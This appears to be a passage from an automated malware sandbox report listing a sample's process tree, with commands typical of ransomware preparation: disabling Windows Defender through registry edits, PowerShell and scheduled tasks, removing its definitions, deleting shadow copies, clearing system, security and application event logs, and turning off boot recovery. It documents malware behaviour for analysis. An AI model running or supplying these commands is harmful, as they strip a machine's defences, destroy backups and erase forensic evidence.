-
-
-
C:\Windows\system32\net.exenet.exe stop "SDRSVC" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1316 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SDRSVC" /y3⤵PID:820
-
-
-
C:\Windows\system32\net.exenet.exe stop "SstpSvc" /y2⤵
- Suspicious use of WriteProcessMemory
PID:428 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SstpSvc" /y3⤵PID:1912
-
-
-
C:\Windows\system32\net.exenet.exe stop "UI0Detect" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1520 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "UI0Detect" /y3⤵PID:852
-
-
-
C:\Windows\system32\net.exenet.exe stop "VSS" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1456 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VSS" /y3⤵PID:1960
-
-
-
C:\Windows\system32\net.exenet.exe stop "wbengine" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1668 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "wbengine" /y3⤵PID:1348
-
-
-
C:\Windows\system32\net.exenet.exe stop "WebClient" /y2⤵
- Suspicious use of WriteProcessMemory
PID:988 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "WebClient" /y3⤵PID:1556
-
-
-
C:\Windows\system32\sc.exesc.exe config "NetMsmqActivator" start= disabled2⤵PID:1744
-
-
C:\Windows\system32\sc.exesc.exe config "SamSs" start= disabled2⤵PID:1748
-
-
C:\Windows\system32\sc.exesc.exe config "SDRSVC" start= disabled2⤵PID:1152
-
-
C:\Windows\system32\sc.exesc.exe config "SstpSvc" start= disabled2⤵PID:1216
-
-
C:\Windows\system32\sc.exesc.exe config "UI0Detect" start= disabled2⤵PID:1060
-
-
C:\Windows\system32\sc.exesc.exe config "VSS" start= disabled2⤵PID:904
-
-
C:\Windows\system32\sc.exesc.exe config "wbengine" start= disabled2⤵PID:936
-
-
C:\Windows\system32\sc.exesc.exe config "WebClient" start= disabled2⤵PID:1944
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1700
-
-
C:\Windows\system32\reg.exereg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f2⤵PID:1488
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f2⤵PID:532
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f2⤵PID:524
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f2⤵PID:2044
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f2⤵PID:1920
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f2⤵PID:852
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f2⤵PID:1552
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f2⤵PID:1644
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f2⤵PID:1672
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f2⤵PID:1968
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f2⤵PID:2000
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f2⤵PID:688
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f2⤵PID:1976
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:1432
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:1856
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable2⤵PID:1608
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable2⤵PID:1300
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable2⤵PID:1892
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable2⤵PID:1904
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable2⤵PID:1792
-
-
C:\Windows\system32\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f2⤵PID:1640
-
-
C:\Windows\system32\reg.exereg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f2⤵PID:1548
-
-
C:\Windows\system32\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f2⤵PID:1720
-
-
C:\Windows\system32\reg.exereg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f2⤵PID:924
-
-
C:\Windows\system32\reg.exereg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f2⤵PID:744
-
-
C:\Windows\system32\reg.exereg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f2⤵PID:764
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1600
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:416
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1812
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:992
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f2⤵
- Modifies security service
PID:1032
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:564
-
-
C:\Windows\system32\vssadmin.exevssadmin.exe delete shadows /all /quiet2⤵
- Interacts with shadow copies
PID:1964
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl system2⤵
- Suspicious use of AdjustPrivilegeToken
PID:624
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl security2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1068
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl application2⤵
- Suspicious use of AdjustPrivilegeToken
PID:336
-
-
C:\Windows\System32\Wbem\wmic.exewmic.exe SHADOWCOPY /nointeractive2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1636
-
-
C:\Windows\System32\Wbem\wmic.exewmic.exe shadowcopy delete2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1280
-
-
C:\Windows\system32\bcdedit.exebcdedit.exe /set {default} bootstatuspolicy ignoreallfailures2⤵
- Modifies boot configuration data using bcdedit
PID:1344
-
-
C:\Windows\system32\bcdedit.exebcdedit.exe /set {default} recoveryenabled no2⤵
- Modifies boot configuration data using bcdedit
PID:928
-
-
C:\Windows\system32\cmd.execmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All2⤵PID:816
-
C:\Program Files\Windows Defender\MpCmdRun.exe"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All3⤵
- Deletes Windows Defender Definitions
PID:1200
-
-
-
C:\Windows\system32\cmd.execmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true2⤵PID:1620
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIOAVProtection $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:1676
-
-
-
C:\Windows\system32\cmd.execmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true2⤵PID:2116
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableRealtimeMonitoring $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:2136
-
-